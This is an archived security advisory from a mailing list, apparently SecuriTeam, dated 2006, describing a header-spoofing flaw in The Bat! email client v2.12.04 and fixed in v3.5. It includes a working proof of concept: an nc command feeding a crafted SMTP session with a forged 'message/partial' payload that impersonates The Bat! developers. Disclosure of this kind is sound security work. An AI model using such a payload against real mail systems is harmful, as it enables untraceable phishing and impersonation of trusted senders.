Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] The Bat! Message Headers Spoofing

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] The Bat! Message Headers Spoofing
Date: 7 Feb 2006 16:08:10 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  The Bat! Message Headers Spoofing
------------------------------------------------------------------------


SUMMARY

 <http://thebat.net/> The Bat! is "an eMail Client". Improper handling of 
email headers allows attackers to spoof The Bat! email client.

DETAILS

Vulnerable Systems:
 * The Bat! version 2.12.04

Immune Systems:
 * The Bat! version 3.5

A design flaw in the way The Bat! displays a 'message/partial' message 
allows an attacker to spoof RFC 822 headers, including Received:  and  
Message-ID:. It makes it possible to create an untraceable message and 
spoof the message origin, including the sender's network.

The Bat! silently re-assembles a partial message and shows the 
encapsulated data, with the real message headers discarded.

Proof of Concept:
Replace @example.com with destination address
nc ip_of_smtp_relay 25 <thebatexploit.txt

-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <phiby@example.com>
RCPT TO: <phiby@example.com>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <phiby@example.com>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
Message-ID: <p#1split@ACB0994591752.20060130184706@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; 
id="split@ACB0994591752.20060130184706@thebat.net";
        number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
        by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
        for <phiby@example.com>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <bugs@thebat.net>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/


======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] The Bat! Message Headers Spoofing, SecuriTeam <=
Previous by Date:  [EXPL] Home FTP Server DoS (Exploit), SecuriTeam
Next by Date:  [EXPL] Qualcomm WorldMail IMAP Server LIST Buffer Overflow (Exploit, Perl), SecuriTeam
Previous by Thread:  [EXPL] Home FTP Server DoS (Exploit), SecuriTeam
Next by Thread:  [EXPL] Qualcomm WorldMail IMAP Server LIST Buffer Overflow (Exploit, Perl), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]